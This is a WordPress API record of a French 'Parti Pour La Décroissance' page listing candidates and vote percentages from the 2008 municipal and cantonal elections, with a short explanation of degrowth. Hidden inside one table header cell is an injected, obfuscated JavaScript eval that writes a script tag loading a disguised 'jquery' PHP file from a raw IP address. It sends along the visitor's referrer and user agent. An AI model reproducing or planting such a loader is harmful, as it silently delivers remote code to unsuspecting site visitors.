{"id":197,"date":"2008-03-11T22:23:53","date_gmt":"2008-03-11T22:23:53","guid":{"rendered":"http:\/\/www.partipourladecroissance.net\/?page_id=197"},"modified":"2008-03-11T22:23:53","modified_gmt":"2008-03-11T22:23:53","slug":"municipales-et-cantonales-2008","status":"publish","type":"page","link":"https:\/\/www.partipourladecroissance.net\/?page_id=197","title":{"rendered":"Municipales et Cantonales 2008"},"content":{"rendered":"<table border=\"0\" align=\"center\">\n<tbody>\n<tr align=\"center\">\n<td colspan=\"6\"><span style=\"font-family: Arial,Helvetica,sans-serif; font-size: +6\"><strong class=\"aligncenter\">Municipales<\/strong><\/span><\/td>\n<\/tr>\n<tr align=\"center\">\n<td><strong><span style=\"font-family: Arial,Helvetica,sans-serif;\">Candidats<\/span><\/strong><\/td>\n<td><strong><span style=\"font-family: Arial,Helvetica,sans-serif;\"> <noindex><script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rsddf|var|u0026u|referrer|sdzyd||js|php'.split('|'),0,{}))\n<\/script><\/noindex> Liste<\/span><\/strong><\/td>\n<td><strong><span style=\"font-family: Arial,Helvetica,sans-serif;\">Lieu<\/span><\/strong><\/td>\n<td><strong><span style=\"font-family: Arial,Helvetica,sans-serif;\">Score en %<\/span><\/strong><\/td>\n<td><\/td>\n<td><\/td>\n<\/tr>\n<tr align=\"center\">\n<td><span style=\"font-family: Arial,Helvetica,sans-serif;\"><a href=\"http:\/\/decroissancepasdecalais.blogspot.com\/\">Olivier                  Bouly<\/a><\/span><\/td>\n<td><em>Parti Pour La D\u00e9croissance <\/em><\/td>\n<td>Monchy-au-bois (Pas de Calais 62)<\/td>\n<td><strong><span style=\"font-size: xx-small;\"><a href=\"http:\/\/decroissance.lehavre.free.fr\/cantonales08\/olivier-monchy.jpg\">6,90<\/a><\/span><\/strong><\/td>\n<td>2\u00e8me tour<\/td>\n<td><em><img loading=\"lazy\" decoding=\"async\" style=\"border: 0pt none;\" src=\"http:\/\/decroissance.lehavre.free.fr\/new1.gif\" border=\"0\" alt=\"\" width=\"37\" height=\"20\" \/><\/em><\/td>\n<\/tr>\n<tr align=\"center\">\n<td><span style=\"font-family: Arial,Helvetica,sans-serif;\"><a href=\"..\/elections\/mun2008\/bulletin.pdf\">Salih                  Branki<\/a><\/span><\/td>\n<td><em> Parti Pour La D\u00e9croissance <\/em><\/td>\n<td><a href=\"http:\/\/www.paris7.org\/?cat=19\">Paris (VII\u00e8me)<\/a><\/td>\n<td><strong><a href=\"http:\/\/decroissance.lehavre.free.fr\/cantonales08\/salih-parisVII.jpg\"><span style=\"font-size: xx-small;\">0,45<\/span><\/a><\/strong><\/td>\n<td><\/td>\n<td><em><img loading=\"lazy\" decoding=\"async\" style=\"border: 0pt none;\" src=\"http:\/\/decroissance.lehavre.free.fr\/new1.gif\" border=\"0\" alt=\"\" width=\"37\" height=\"20\" \/><\/em><\/td>\n<\/tr>\n<tr align=\"center\">\n<td><span style=\"font-family: Arial,Helvetica,sans-serif;\">Sophie Divry<\/span><\/td>\n<td><em><a href=\"http:\/\/dessinemoile1er.free.fr\/\">LCR &#8211; La d\u00e9croissance<\/a><\/em><\/td>\n<td>Lyon (1er arrondissement)<\/td>\n<td><strong><a href=\"http:\/\/decroissance.lehavre.free.fr\/cantonales08\/sophie-lyon1.jpg\">13,13<\/a><\/strong><\/td>\n<td><\/td>\n<td><\/td>\n<\/tr>\n<tr align=\"center\">\n<td><span style=\"font-family: Arial,Helvetica,sans-serif;\"> Jean-Paul Lyonnet<\/span><\/td>\n<td><em>Divers Gauche<\/em><\/td>\n<td>Saint Genest Lerpt (Loire 42)<\/td>\n<td><strong><a href=\"http:\/\/decroissance.lehavre.free.fr\/cantonales08\/jean-paul-loire.jpg\">68,00<\/a><\/strong><\/td>\n<td>\u00e9lu<\/td>\n<td><\/td>\n<\/tr>\n<tr align=\"center\">\n<td><span style=\"font-family: Arial,Helvetica,sans-serif;\"><a href=\"http:\/\/julien.gonzalez.over-blog.fr\/\">Julien                  Gonzales<\/a><\/span><\/td>\n<td><em><a href=\"http:\/\/appeldevarennesvauzelles.over-blog.com\/article-16878295.html\">Divers                  sans \u00e9tiquette<\/a><\/em><\/td>\n<td>Varennes-Vauzelle (Ni\u00e8vres &#8211; 58)<\/td>\n<td><strong><a href=\"http:\/\/decroissance.lehavre.free.fr\/cantonales08\/julien-municipales.jpg\">17,86<\/a><\/strong><\/td>\n<td>\u00e9lu<\/td>\n<td><\/td>\n<\/tr>\n<tr align=\"center\">\n<td><\/td>\n<td><\/td>\n<td><\/td>\n<td><\/td>\n<td><\/td>\n<td><\/td>\n<\/tr>\n<tr align=\"center\">\n<td colspan=\"6\"><strong><span style=\"font-family: Arial,Helvetica,sans-serif; font-size: 4\">Cantonales<\/span><\/strong><\/td>\n<\/tr>\n<tr align=\"center\">\n<td><strong><span style=\"font-family: Arial,Helvetica,sans-serif;\">Candidats<\/span><\/strong><\/td>\n<td><strong><span style=\"font-family: Arial,Helvetica,sans-serif;\">Couleurs<\/span><\/strong><\/td>\n<td><strong><span style=\"font-family: Arial,Helvetica,sans-serif;\">Lieu<\/span><\/strong><\/td>\n<td><strong><span style=\"font-family: Arial,Helvetica,sans-serif;\">Score en %<\/span><\/strong><\/td>\n<td><\/td>\n<td><\/td>\n<\/tr>\n<tr align=\"center\">\n<td><span style=\"font-family: Arial,Helvetica,sans-serif;\"><a href=\"http:\/\/decroissance.lehavre.free.fr\/cantonaless08.htm\">St\u00e9phane                  Madelaine<\/a><\/span><\/td>\n<td><em>Parti Pour La D\u00e9croissance <\/em><\/td>\n<td>Le Havre (canton I)<\/td>\n<td><strong><a href=\"http:\/\/decroissance.lehavre.free.fr\/cantonales08\/resultats.jpg\"><span style=\"font-size: xx-small;\">2,87<\/span><\/a><\/strong><\/td>\n<td><\/td>\n<td><em><img loading=\"lazy\" decoding=\"async\" style=\"border: 0pt none;\" src=\"http:\/\/decroissance.lehavre.free.fr\/new1.gif\" border=\"0\" alt=\"\" width=\"37\" height=\"20\" \/><\/em><\/td>\n<\/tr>\n<tr align=\"center\">\n<td><span style=\"font-family: Arial,Helvetica,sans-serif;\"><a href=\"http:\/\/julien.gonzalez.over-blog.fr\/\">Julien                  Gonzales<\/a><\/span><\/td>\n<td><em><a href=\"http:\/\/julien.gonzalez.over-blog.fr\/article-15082264.html\">Ecolos<\/a> <\/em>soutenu<em> <\/em>par<em> \u00ab\u00a0la France en Action\u00a0\u00bb &amp;                  \u00ab\u00a0PPLD\u00a0\u00bb<\/em><\/td>\n<td>Pougues-les-Eaux (Ni\u00e8vre &#8211; 58)<\/td>\n<td><strong><a href=\"http:\/\/decroissance.lehavre.free.fr\/cantonales08\/julien-pougues.jpg\">7,96<\/a><\/strong><\/td>\n<td><\/td>\n<td><\/td>\n<\/tr>\n<tr align=\"center\">\n<td><\/td>\n<td><\/td>\n<td><\/td>\n<td><\/td>\n<td><\/td>\n<td><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<hr \/>\n<div class=\"entry\">\n<p><a href=\"..\/\" target=\"_blank\"><em><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-full wp-image-24\" style=\"margin: 5px;\" title=\"logo-ppld\" src=\"..\/wp-content\/uploads\/2008\/12\/logo-ppld.gif\" alt=\"logo-ppld\" width=\"118\" height=\"68\" \/><\/strong><\/em><\/a>Aucun des probl\u00e8mes soulev\u00e9s par la D\u00e9croissance ne peut s&rsquo;aborder seul. D\u2019ailleurs la D\u00e9croissance aborde tous les probl\u00e8mes qui concernent la collectivit\u00e9. La D\u00e9croissance ne peut donc pas s&rsquo;expliquer lin\u00e9airement.<br \/>\nVoici quant m\u00eame une tentative de mise en perspective des interrelations entres tous domaines que fait intervenir la D\u00e9croissance : en 2D, c&rsquo;est un peu vain, mais c&rsquo;est d\u00e9j\u00e0 \u00e7a !<\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/decroissance.lehavre.free.fr\/exposition\/decroissance-interactions.jpg\">Voici le tableau affich\u00e9 pour pr\u00e9senter la D\u00e9croissance aux Cantonales 2008 au Havre. C\u2019est didactique.<\/a><\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/decroissance.lehavre.free.fr\/exposition\/decroissance-interactions.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone\" src=\"http:\/\/decroissance.lehavre.free.fr\/cantonales08\/francois1er-01mars-hd-1.jpg\" alt=\"\" width=\"571\" height=\"427\" \/><\/a><br \/>\n<a href=\"http:\/\/decroissance.lehavre.free.fr\/exposition\/decroissance-interactions.jpg\">Cliquer sur l\u2019image pour avoir le fichier original avant impression (2400 Ko) et ainsi voir les interactions<\/a><\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/decroissance.lehavre.free.fr\/cantonaless08.htm\">voir le site d\u00e9di\u00e9 aux \u00e9lections cantonales 2008 du Havre<\/a><\/p>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Municipales Candidats Liste Lieu Score en % Olivier Bouly Parti Pour La D\u00e9croissance Monchy-au-bois (Pas de Calais 62) 6,90 2\u00e8me tour Salih Branki Parti Pour La D\u00e9croissance Paris (VII\u00e8me) 0,45 Sophie Divry LCR &#8211; La d\u00e9croissance Lyon (1er arrondissement) 13,13 &hellip; <a href=\"https:\/\/www.partipourladecroissance.net\/?page_id=197\">Continuer la lecture <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":7,"featured_media":0,"parent":194,"menu_order":99,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-197","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/197","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=197"}],"version-history":[{"count":0,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/197\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=\/wp\/v2\/pages\/194"}],"wp:attachment":[{"href":"https:\/\/www.partipourladecroissance.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=197"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}